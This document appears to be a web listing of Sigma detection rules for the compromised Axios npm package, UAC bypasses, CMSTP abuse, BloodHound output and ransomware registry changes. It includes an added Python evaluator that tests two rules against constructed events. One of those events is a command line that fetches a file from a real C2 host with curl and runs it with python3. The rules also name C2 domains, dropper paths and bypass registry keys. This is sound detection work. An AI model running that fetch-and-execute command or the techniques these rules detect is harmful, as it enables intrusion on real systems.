On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, each pulling in a malicious dependency, plain-crypto-js, whose postinstall script acted as a cross-platform RAT dropper.
The dropper contacted a C2 server, delivered platform-specific payloads, deleted itself, and replaced package.json to evade detection.
The attack used cscript.exe (VBScript), curl.exe (C2), and PowerShell masquerading as Windows Terminal.
references:
- https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan
- https://www.derp.ca/research/axios-npm-supply-chain-rat/
- https://www.trendmicro.com/zh_hk/research/26/c/axios-npm-package-compromised.html
- https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections
- https://www.virustotal.com/gui/file/e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-04-01
tags:
- attack.initial-access
- attack.t1195.002
- detection.emerging-threats
logsource:
category: file_event
product: windows
detection:
selection_img:
Image|endswith:
- '\node.exe'
- '\powershell.exe'
selection_fils:
- TargetFilename:
- 'C:\ProgramData\wt.exe'
- 'C:\ProgramData\system.bat'
- TargetFilename|contains|all:
- 'C:\Users\'
- '\AppData\Local\Temp\6202033.vbs'
- TargetFilename|contains|all:
- 'C:\Users\'
- '\AppData\Local\Temp\6202033.ps1'
condition: all of selection_*
falsepositives:
- Highly unlikely
level: high
Level: high · Quality tier: Moderate · Alert volume: Medium FP
Axios NPM Compromise Indicators - Linux
Detects the Linux-specific execution chain of the plain-crypto-js malicious npm dependency pulled in by the compromised Axios npm package, including payload download via curl and detached execution using nohup and python3.
On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, each pulling in a malicious dependency, plain-crypto-js, whose postinstall script acted as a cross-platform RAT dropper.
The dropper contacted a C2 server, delivered platform-specific payloads, deleted itself, and replaced package.json to evade detection.
title: Axios NPM Compromise Indicators - Linux
id: 0a23a62d-c5b3-468b-a072-25064a9a8c87
status: experimental
description: |
Detects the Linux-specific execution chain of the plain-crypto-js malicious npm dependency pulled in by the compromised Axios npm package, including payload download via curl and detached execution using nohup and python3.
On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, each pulling in a malicious dependency, plain-crypto-js, whose postinstall script acted as a cross-platform RAT dropper.
The dropper contacted a C2 server, delivered platform-specific payloads, deleted itself, and replaced package.json to evade detection.
references:
- https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan
- https://www.derp.ca/research/axios-npm-supply-chain-rat/
- https://www.trendmicro.com/zh_hk/research/26/c/axios-npm-package-compromised.html
- https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections
- https://www.virustotal.com/gui/file/e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-04-01
tags:
- attack.initial-access
- attack.t1195.002
- attack.execution
- attack.command-and-control
- attack.t1059.006
- attack.t1059.004
- attack.t1105
- detection.emerging-threats
logsource:
category: process_creation
product: linux
detection:
selection_node_shell:
ParentImage|endswith:
- '/node'
- '/bun'
CommandLine|contains|all:
- 'curl '
- '/tmp/ld.py'
- 'python3 '
- 'nohup '
- '6202033'
selection_curl_download:
Image|endswith: '/curl'
CommandLine|contains: 'http://sfrclak.com'
condition: 1 of selection_*
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Moderate
Medium FP
Axios NPM Compromise Indicators - macOS
Detects the macOS-specific execution chain of the plain-crypto-js malicious npm dependency in Axios NPM Package, including AppleScript execution via osascript, payload download, permission modification, execution, and cleanup.
title: Axios NPM Compromise Indicators - macOS
id: a09ee860-31b3-4586-8a68-0ebd74ce0e5f
status: experimental
description: |
    Detects the macOS-specific execution chain of the plain-crypto-js malicious npm dependency in Axios NPM Package, including AppleScript execution via osascript, payload download, permission modification, execution, and cleanup.
author: Swachchhanda Shrawan Poudel (Nextron Systems)
references:
    - https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan
    - https://www.derp.ca/research/axios-npm-supply-chain-rat/
    - https://www.trendmicro.com/zh_hk/research/26/c/axios-npm-package-compromised.html
    - https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections
    - https://www.virustotal.com/gui/file/e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09
date: 2026-04-01
tags:
    - attack.initial-access
    - attack.t1195.002
    - attack.execution
    - attack.command-and-control
    - attack.t1059.002
    - attack.t1059.004
    - attack.t1105
    - detection.emerging-threats
logsource:
    category: process_creation
    product: macos
detection:
    selection_osascript:
        CommandLine|contains|all:
            - 'nohup '
            - 'osascript '
            - '/tmp/6202033'
    selection_curl_download:
        CommandLine|contains|all:
            - 'curl '
            - 'packages.npm.org/product'
            - '/Library/Caches/com.apple.act.mond'
    selection_cleanup:
        CommandLine|contains|all:
            - 'rm '
            - '-rf '
            - '/tmp/6202033'
    condition: 1 of selection_*
falsepositives:
    - Unlikely
level: high
high
Moderate
High FP
BaaUpdate.exe Suspicious DLL Load
Detects the BitLocker Access Agent Update Utility (baaupdate.exe) loading DLLs from suspicious, publicly writable locations, which could indicate an attempt at lateral movement via BitLocker DCOM and COM hijacking.
This technique abuses COM classes configured as INTERACTIVE USER to spawn processes in the context of the logged-on user's session. Specifically, it targets the BDEUILauncher class (CLSID ab93b6f1-be76-4185-a488-a9001b105b94),
which can launch BaaUpdate.exe; BaaUpdate.exe is vulnerable to COM hijacking when started with input parameters. This allows attackers to execute code in the user's context without needing to steal credentials or use additional techniques to compromise the account.
title: BaaUpdate.exe Suspicious DLL Load
id: 6e8fe0a8-ba0b-4a93-8f9e-82657e7a5984
related:
    - id: 9f38c1db-e2ae-40bf-81d0-5b68f73fb512 # Suspicious BitLocker Access Agent Update Utility Execution
      type: similar
status: experimental
description: |
    Detects the BitLocker Access Agent Update Utility (baaupdate.exe) loading DLLs from suspicious, publicly writable locations, which could indicate an attempt at lateral movement via BitLocker DCOM and COM hijacking.
    This technique abuses COM classes configured as INTERACTIVE USER to spawn processes in the context of the logged-on user's session. Specifically, it targets the BDEUILauncher class (CLSID ab93b6f1-be76-4185-a488-a9001b105b94),
    which can launch BaaUpdate.exe; BaaUpdate.exe is vulnerable to COM hijacking when started with input parameters. This allows attackers to execute code in the user's context without needing to steal credentials or use additional techniques to compromise the account.
references:
    - https://github.com/rtecCyberSec/BitlockMove
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-10-18
tags:
    - attack.stealth
    - attack.t1218
    - attack.lateral-movement
    - attack.t1021.003
logsource:
    category: image_load
    product: windows
detection:
    selection:
        Image|endswith: '\BaaUpdate.exe'
        ImageLoaded|endswith: '.dll'
        ImageLoaded|contains:
            - ':\Perflogs\'
            - ':\Users\Default\'
            - ':\Users\Public\'
            - ':\Windows\Temp\'
            - '\AppData\Local\Temp\'
            - '\AppData\Roaming\'
            - '\Contacts\'
            - '\Favorites\'
            - '\Favourites\'
            - '\Links\'
            - '\Music\'
            - '\Pictures\'
            - '\ProgramData\'
            - '\Temporary Internet'
            - '\Videos\'
    condition: selection
falsepositives:
    - Unknown
level: high
high
Strong
Medium FP
Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Detects attackers using tooling with bad opsec defaults.
E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.
One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.
title: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
id: a7c3d773-caef-227e-a7e7-c2f13c622329
related:
    - id: f5647edc-a7bf-4737-ab50-ef8c60dc3add
      type: obsolete
status: test
description: |
    Detects attackers using tooling with bad opsec defaults.
    E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.
    One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.
references:
    - https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/
    - https://www.cobaltstrike.com/help-opsec
    - https://twitter.com/CyberRaiju/status/1251492025678983169
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32
    - https://learn.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool
    - https://learn.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool
author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)
date: 2020-10-23
modified: 2024-08-15
tags:
    - attack.stealth
    - attack.t1218.011
logsource:
    category: process_creation
    product: windows
detection:
    selection_werfault:
        Image|endswith: '\WerFault.exe'
        CommandLine|endswith: 'WerFault.exe'
    selection_rundll32:
        Image|endswith: '\rundll32.exe'
        CommandLine|endswith: 'rundll32.exe'
    selection_regsvcs:
        Image|endswith: '\regsvcs.exe'
        CommandLine|endswith: 'regsvcs.exe'
    selection_regasm:
        Image|endswith: '\regasm.exe'
        CommandLine|endswith: 'regasm.exe'
    selection_regsvr32:
        Image|endswith: '\regsvr32.exe'
        CommandLine|endswith: 'regsvr32.exe'
    filter_optional_edge_update:
        ParentImage|contains: '\AppData\Local\Microsoft\EdgeUpdate\Install\{'
        Image|endswith: '\rundll32.exe'
        CommandLine|endswith: 'rundll32.exe'
    filter_optional_chromium_installer:
        # As reported in https://github.com/SigmaHQ/sigma/issues/4570 and others
        ParentImage|contains:
            - '\AppData\Local\BraveSoftware\Brave-Browser\Application\'
            - '\AppData\Local\Google\Chrome\Application\'
        ParentImage|endswith: '\Installer\setup.exe'
        ParentCommandLine|contains: '--uninstall '
        Image|endswith: '\rundll32.exe'
        CommandLine|endswith: 'rundll32.exe'
    condition: 1 of selection_* and not 1 of filter_optional_*
falsepositives:
    - Unlikely
level: high
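Rules like the Axios Linux rule further up and the sacrificial-process rule directly above are easiest to understand by running them over events. What follows is an added example, not code from this page, from SigmaHQ or from any vendor: a deliberately small evaluator for the Sigma modifiers those two rules use (`endswith`, `contains`, `contains|all`) and for conditions of the shape `1 of selection_*` and `1 of selection_* and not 1 of filter_optional_*`, applied to constructed process_creation events. The events are made up to exercise the rules; in particular the node-spawned shell line is not the real dropper's command line. The evaluator lowercases both sides because most Sigma backends match case-insensitively, supports no wildcards, and parses no condition strings, so each condition is written as a Python function. Use pySigma and your backend for anything real; this only shows how the matching semantics work.

```python
"""Added example (not from the page or SigmaHQ): a minimal evaluator for the
Sigma modifiers used by the two rules above, run over constructed events."""


def field_matches(value, modifiers: list, wanted) -> bool:
    """Apply one 'Field|mod1|mod2: value-or-list' clause to an event field."""
    if value is None:
        return False
    v = str(value).lower()
    pats = [str(p).lower() for p in (wanted if isinstance(wanted, list) else [wanted])]
    if "contains" in modifiers:
        op = lambda p: p in v
    elif "endswith" in modifiers:
        op = lambda p: v.endswith(p)
    elif "startswith" in modifiers:
        op = lambda p: v.startswith(p)
    else:
        op = lambda p: v == p
    hits = [op(p) for p in pats]
    return all(hits) if "all" in modifiers else any(hits)


def selection_matches(selection, event: dict) -> bool:
    """A map AND-s its fields; a list of maps is OR-ed (Sigma semantics)."""
    if isinstance(selection, list):
        return any(selection_matches(s, event) for s in selection)
    for key, wanted in selection.items():
        field, *mods = key.split("|")
        if not field_matches(event.get(field), mods, wanted):
            return False
    return True


def one_of(results: dict, prefix: str) -> bool:
    """Sigma '1 of <prefix>*' over the per-selection results."""
    return any(v for k, v in results.items() if k.startswith(prefix))


def evaluate(rule: dict, event: dict) -> bool:
    results = {name: selection_matches(sel, event) for name, sel in rule["detection"].items()}
    return rule["condition"](results)


# The two rules from the listing, transcribed into dicts (condition as a function).
AXIOS_LINUX = {
    "detection": {
        "selection_node_shell": {
            "ParentImage|endswith": ["/node", "/bun"],
            "CommandLine|contains|all": ["curl ", "/tmp/ld.py", "python3 ", "nohup ", "6202033"],
        },
        "selection_curl_download": {"Image|endswith": "/curl", "CommandLine|contains": "http://sfrclak.com"},
    },
    "condition": lambda r: one_of(r, "selection_"),
}
BAD_OPSEC_DEFAULTS = {
    "detection": {
        "selection_rundll32": {"Image|endswith": "\\rundll32.exe", "CommandLine|endswith": "rundll32.exe"},
        "filter_optional_chromium_installer": {
            "ParentImage|contains": ["\\AppData\\Local\\BraveSoftware\\Brave-Browser\\Application\\",
                                     "\\AppData\\Local\\Google\\Chrome\\Application\\"],
            "ParentImage|endswith": "\\Installer\\setup.exe",
            "ParentCommandLine|contains": "--uninstall ",
            "Image|endswith": "\\rundll32.exe",
            "CommandLine|endswith": "rundll32.exe",
        },
    },
    "condition": lambda r: one_of(r, "selection_") and not one_of(r, "filter_optional_"),
}

# Constructed events shaped like process_creation records; not captured from any host.
EVENTS = {
    "axios_like_shell": {"ParentImage": "/usr/local/bin/node", "Image": "/bin/sh",
                         "CommandLine": 'sh -c "curl -s http://sfrclak.com/x -o /tmp/ld.py; nohup python3 /tmp/ld.py 6202033 &"'},
    "benign_curl": {"ParentImage": "/bin/bash", "Image": "/usr/bin/curl",
                    "CommandLine": "curl -fsSL https://example.org/install.sh"},
    "bare_rundll32": {"ParentImage": "C:\\Windows\\System32\\svchost.exe",
                      "Image": "C:\\Windows\\System32\\rundll32.exe", "CommandLine": "rundll32.exe"},
    "chrome_uninstall_rundll32": {
        "ParentImage": "C:\\Users\\alice\\AppData\\Local\\Google\\Chrome\\Application\\120.0.0.0\\Installer\\setup.exe",
        "ParentCommandLine": "setup.exe --uninstall --chrome",
        "Image": "C:\\Windows\\System32\\rundll32.exe", "CommandLine": "rundll32.exe"},
    "normal_rundll32": {"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\rundll32.exe",
                        "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL"},
}


def run_examples() -> dict:
    """Rule verdict per constructed event; only the two Axios/opsec rules are checked."""
    rule_for = {"axios_like_shell": AXIOS_LINUX, "benign_curl": AXIOS_LINUX}
    return {name: evaluate(rule_for.get(name, BAD_OPSEC_DEFAULTS), ev) for name, ev in EVENTS.items()}


if __name__ == "__main__":
    for name, hit in run_examples().items():
        print(f"{name:28s} {'ALERT' if hit else 'no match'}")
```

The bare `rundll32.exe` event fires, the same command line spawned by a Chrome uninstaller is suppressed by the optional filter, and `rundll32.exe shell32.dll,Control_RunDLL` never matches because `endswith` anchors on the end of the command line; this is why the rule stays quiet on normal use despite its broad image list.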
high
Moderate
High FP
Base64 Encoded PowerShell Command Detected
Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string
title: Base64 Encoded PowerShell Command Detected
id: e32d4572-9826-4738-b651-95fa63747e8a
status: test
description: Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string
references:
    - https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
author: Florian Roth (Nextron Systems)
date: 2020-01-29
modified: 2023-01-26
tags:
    - attack.stealth
    - attack.t1027
    - attack.execution
    - attack.t1140
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains: '::FromBase64String('
    condition: selection
falsepositives:
    - Administrative script libraries
level: high
high
Moderate
High FP
Base64 MZ Header In CommandLine
Detects encoded base64 MZ header in the commandline
title: Base64 MZ Header In CommandLine
id: 22e58743-4ac8-4a9f-bf19-00a0428d8c5f
status: test
description: Detects encoded base64 MZ header in the commandline
references:
    - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-12
tags:
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - 'TVqQAAMAAAAEAAAA' # MZ..........
            - 'TVpQAAIAAAAEAA8A'
            - 'TVqAAAEAAAAEABAA'
            - 'TVoAAAAAAAAAAAAA'
            - 'TVpTAQEAAAAEAAAA'
    condition: selection
falsepositives:
    - Unlikely
level: high
high
Strong
Medium FP
Binary Padding - MacOS
Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detects the use of dd and truncate to append junk data to a file.
title: Binary Padding - MacOS
id: 95361ce5-c891-4b0a-87ca-e24607884a96
status: test
description: Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detects the use of dd and truncate to append junk data to a file.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md
    - https://linux.die.net/man/1/truncate
    - https://linux.die.net/man/1/dd
author: 'Igor Fits, Mikhail Larin, oscd.community'
date: 2020-10-19
modified: 2023-02-17
tags:
    - attack.stealth
    - attack.t1027.001
logsource:
    product: macos
    category: process_creation
detection:
    selection_truncate:
        Image|endswith: '/truncate'
        CommandLine|contains: '-s +'
    selection_dd:
        Image|endswith: '/dd'
        CommandLine|contains:
            - 'if=/dev/zero' # if input is not /dev/zero, then there is no null padding
            - 'if=/dev/random' # high-quality random data
            - 'if=/dev/urandom' # low-quality random data
    condition: 1 of selection_*
falsepositives:
    - Legitimate script work
level: high
high
Moderate
Medium FP
Blackbyte Ransomware Registry
Detects specific Windows registry modifications made by BlackByte ransomware variants.
BlackByte sets three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption.
This rule triggers when any of the following registry values is set to DWORD 1; however, all three should be investigated as part of a larger BlackByte ransomware detection and response effort.
title: Blackbyte Ransomware Registry
id: 83314318-052a-4c90-a1ad-660ece38d276
status: test
description: |
    Detects specific Windows registry modifications made by BlackByte ransomware variants.
    BlackByte sets three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption.
    This rule triggers when any of the following registry values is set to DWORD 1; however, all three should be investigated as part of a larger BlackByte ransomware detection and response effort.
references:
    - https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social
    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/
author: frack113
date: 2022-01-24
modified: 2025-10-21
tags:
    - attack.persistence
    - attack.defense-impairment
    - attack.t1112
    - detection.emerging-threats
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject:
            - 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy'
            - 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections'
            - 'HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\LongPathsEnabled'
        Details: 'DWORD (0x00000001)'
    condition: selection
falsepositives:
    - Unknown
level: high
high
Strong
Medium FP
BloodHound Collection Files
Detects the default file names written by the BloodHound collection tool SharpHound
title: BloodHound Collection Files
id: 02773bed-83bf-469f-b7ff-e676e7d78bab
status: test
description: Detects the default file names written by the BloodHound collection tool SharpHound
references:
    - https://academy.hackthebox.com/course/preview/active-directory-bloodhound/bloodhound--data-collection
author: C.J. May
date: 2022-08-09
modified: 2026-02-19
tags:
    - attack.discovery
    - attack.t1087.001
    - attack.t1087.002
    - attack.t1482
    - attack.t1069.001
    - attack.t1069.002
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename|endswith:
            - 'BloodHound.zip'
            - '_computers.json'
            - '_containers.json'
            # - '_domains.json' # prone to false positives with ProbabilisticRevealTokenRegistry function in Google Chrome
            - '_gpos.json'
            - '_groups.json'
            - '_ous.json'
            - '_users.json'
    filter_optional_ms_winapps:
        Image|endswith: '\svchost.exe'
        TargetFilename|startswith: 'C:\Program Files\WindowsApps\Microsoft.'
        TargetFilename|endswith: '\pocket_containers.json'
    condition: selection and not 1 of filter_optional_*
falsepositives:
    - Some false positives may arise in some environments and this may require some tuning. Add additional filters or reduce the level depending on the level of noise
level: high
high
Moderate
Medium FP
Blue Mockingbird
Attempts to detect system changes made by Blue Mockingbird
title: Blue Mockingbird
id: c3198a27-23a0-4c2c-af19-e5328d49680e
related:
    - id: ce239692-aa94-41b3-b32f-9cab259c96ea
      type: merged
status: test
description: Attempts to detect system changes made by Blue Mockingbird
references:
    - https://redcanary.com/blog/blue-mockingbird-cryptominer/
author: Trent Liffick (@tliffick)
date: 2020-05-14
modified: 2022-10-09
tags:
    - attack.persistence
    - attack.execution
    - attack.defense-impairment
    - attack.t1112
    - attack.t1047
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    sc_cmd:
        Image|endswith: '\cmd.exe'
        CommandLine|contains|all:
            - 'sc config'
            - 'wercplsupporte.dll'
    wmic_cmd:
        Image|endswith: '\wmic.exe'
        CommandLine|endswith: 'COR_PROFILER'
    condition: sc_cmd or wmic_cmd
falsepositives:
    - Unknown
level: high
high
Moderate
High FP
Blue Mockingbird - Registry
Attempts to detect system changes made by Blue Mockingbird
title: Blue Mockingbird - Registry
id: 92b0b372-a939-44ed-a11b-5136cf680e27
related:
    - id: c3198a27-23a0-4c2c-af19-e5328d49680e
      type: derived
status: test
description: Attempts to detect system changes made by Blue Mockingbird
references:
    - https://redcanary.com/blog/blue-mockingbird-cryptominer/
author: Trent Liffick (@tliffick)
date: 2020-05-14
modified: 2023-08-17
tags:
    - attack.execution
    - attack.persistence
    - attack.defense-impairment
    - attack.t1112
    - attack.t1047
    - detection.emerging-threats
logsource:
    product: windows
    category: registry_set
detection:
    selection:
        TargetObject|endswith: '\CurrentControlSet\Services\wercplsupport\Parameters\ServiceDll'
    condition: selection
falsepositives:
    - Unknown
level: high
high
Strong
Medium FP
Bypass UAC Using DelegateExecute
Bypasses User Account Control using a fileless method
title: Bypass UAC Using DelegateExecute
id: 46dd5308-4572-4d12-aa43-8938f0184d4f
status: test
description: Bypasses User Account Control using a fileless method
references:
    - https://learn.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand
    - https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute
author: frack113
date: 2022-01-05
modified: 2023-08-17
tags:
    - attack.privilege-escalation
    - attack.t1548.002
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|endswith: '\open\command\DelegateExecute'
        Details: (Empty)
    condition: selection
falsepositives:
    - Unknown
level: high
regression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/info.yml
simulation:
    - type: atomic-red-team
      name: Bypass UAC using sdclt DelegateExecute
      technique: T1548.002
      atomic_guid: 3be891eb-4608-4173-87e8-78b494c029b7
high
Strong
Medium FP
Bypass UAC Using Event Viewer
Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification
title: Bypass UAC Using Event Viewer
id: 674202d0-b22a-4af4-ae5f-2eda1f3da1af
status: test
description: Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification
references:
    - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd
author: frack113
date: 2022-01-05
modified: 2023-08-17
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1547.010
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|endswith: '_Classes\mscfile\shell\open\command\(Default)'
    filter:
        Details|startswith: '%SystemRoot%\system32\mmc.exe "%1" %'
    condition: selection and not filter
falsepositives:
    - Unknown
level: high
regression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/info.yml
simulation:
    - type: atomic-red-team
      name: Bypass UAC using Event Viewer (cmd)
      technique: T1548.002
      atomic_guid: 5073adf8-9a50-4bd9-b298-a9bd2ead8af9
high
Strong
Medium FP
Bypass UAC Using SilentCleanup Task
Detects the environment variable "windir" being set to a non-default value.
Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task.
The SilentCleanup task, which runs %windir%\system32\cleanmgr.exe, is an auto-elevated task that can be abused to run any file with administrator privileges without a UAC prompt.
title: Bypass UAC Using SilentCleanup Task
id: 724ea201-6514-4f38-9739-e5973c34f49a
status: test
description: |
    Detects the environment variable "windir" being set to a non-default value.
    Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task.
    The SilentCleanup task, which runs %windir%\system32\cleanmgr.exe, is an auto-elevated task that can be abused to run any file with administrator privileges without a UAC prompt.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task
    - https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/
    - https://www.fortinet.com/blog/threat-research/enter-the-darkgate-new-cryptocurrency-mining-and-ransomware-campaign
author: frack113, Nextron Systems
date: 2022-01-06
modified: 2024-01-30
tags:
    - attack.privilege-escalation
    - attack.t1548.002
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|endswith: '\Environment\windir'
    filter_main_default:
        Details: '%SystemRoot%'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: high
regression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/info.yml
simulation:
    - type: atomic-red-team
      name: Bypass UAC using SilentCleanup Task
      technique: T1548.002
      atomic_guid: 28104f8a-4ff1-4582-bcf6-699dce156608
high
Moderate
High FP
Bypass UAC via Fodhelper.exe
Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.
title: Bypass UAC via Fodhelper.exe
id: 7f741dcf-fc22-4759-87b4-9ae8376676a2
status: test
description: Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.
references:
    - https://eqllib.readthedocs.io/en/latest/analytics/e491ce22-792f-11e9-8f5c-d46d6d62a49e.html
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md
author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community
date: 2019-10-24
modified: 2021-11-27
tags:
    - attack.privilege-escalation
    - attack.t1548.002
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\fodhelper.exe'
    condition: selection
falsepositives:
    - Legitimate use of fodhelper.exe utility by legitimate user
level: high
high
Strong
High FP
CMSTP Execution Process Creation
Detects various indicators of Microsoft Connection Manager Profile Installer execution
title: CMSTP Execution Process Creation
id: 7d4cdc5a-0076-40ca-aac8-f7e714570e47
status: stable
description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
references:
    - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
author: Nik Seetharaman
date: 2018-07-16
modified: 2020-12-23
tags:
    - attack.execution
    - attack.stealth
    - attack.t1218.003
    - attack.g0069
    - car.2019-04-001
logsource:
    category: process_creation
    product: windows
detection:
    # CMSTP Spawning Child Process
    selection:
        ParentImage|endswith: '\cmstp.exe'
    condition: selection
falsepositives:
    - Legitimate CMSTP use (unlikely in modern enterprise environments)
level: high
high
Strong
High FP
CMSTP Execution Registry Event
Detects various indicators of Microsoft Connection Manager Profile Installer execution
title: CMSTP Execution Registry Event
id: b6d235fc-1d38-4b12-adbe-325f06728f37
status: stable
description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
references:
    - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
author: Nik Seetharaman
date: 2018-07-16
modified: 2020-12-23
tags:
    - attack.execution
    - attack.stealth
    - attack.t1218.003
    - attack.g0069
    - car.2019-04-001
logsource:
    category: registry_event
    product: windows
detection:
    selection:
        TargetObject|contains: '\cmmgr32.exe'
    condition: selection
falsepositives:
    - Legitimate CMSTP use (unlikely in modern enterprise environments)
level: high
high
Strong
Medium FP
CMSTP UAC Bypass via COM Object Access
Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
title: CMSTP UAC Bypass via COM Object Access
id: 4b60e6f2-bf39-47b4-b4ea-398e33cfe253
status: stable
description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
references:
    - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
    - https://twitter.com/hFireF0X/status/897640081053364225
    - https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf
    - https://github.com/hfiref0x/UACME
author: Nik Seetharaman, Christian Burkard (Nextron Systems)
date: 2019-07-31
modified: 2024-12-01
tags:
    - attack.execution
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1548.002
    - attack.t1218.003
    - attack.g0069
    - car.2019-04-001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\DllHost.exe'
        ParentCommandLine|contains:
            - ' /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}' # cmstplua.dll
            - ' /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}' # CMLUAUTIL
            - ' /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}' # EditionUpgradeManagerObj.dll
            - ' /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}' # colorui.dll
